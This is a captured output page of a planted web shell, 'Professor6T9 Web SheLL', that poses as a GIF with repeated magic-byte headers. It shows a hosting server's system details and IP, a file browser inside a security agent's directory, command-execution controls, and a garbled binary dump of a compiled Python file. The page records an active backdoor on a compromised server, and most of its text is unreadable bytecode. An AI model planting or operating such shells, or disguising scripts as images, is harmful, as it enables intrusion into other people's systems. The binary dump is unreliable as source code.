GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium133.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
162.0.232.69
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
defence360agent
/
wordpress
/
__pycache__
[ HOME ]
Exec
Submit
incident_collector.cpython-311.pyc
� tsi�? � �� � d Z ddlZddlZddlZddlZddlmZ ddlmZ ddl m Z ddlmZ ddl mZ ddlmZmZmZ ej e� � Z G d � d � � Z G d� d� � ZdS ) z1Collector for WordPress CVE protection incidents.� N)�Path)�defaultdict)�WPSite)�get_data_dir)�IncidentFileParser)�upsert_wordpress_incident�bulk_create_wordpress_incidents�build_incident_dictc �h � e Zd ZdZ ddededefd�Zd � Zd ededee ef fd �Z d edefd�ZdS )�IncidentRateLimitera Rate limiter to prevent DoS attacks via incident flooding. Implements per-rule-per-IP rate limiting as per spec: - Maximum 100 incidents for each rule from the same IP within 15 minutes Memory-optimized implementation with bounded entry count using LRU eviction. �d � �'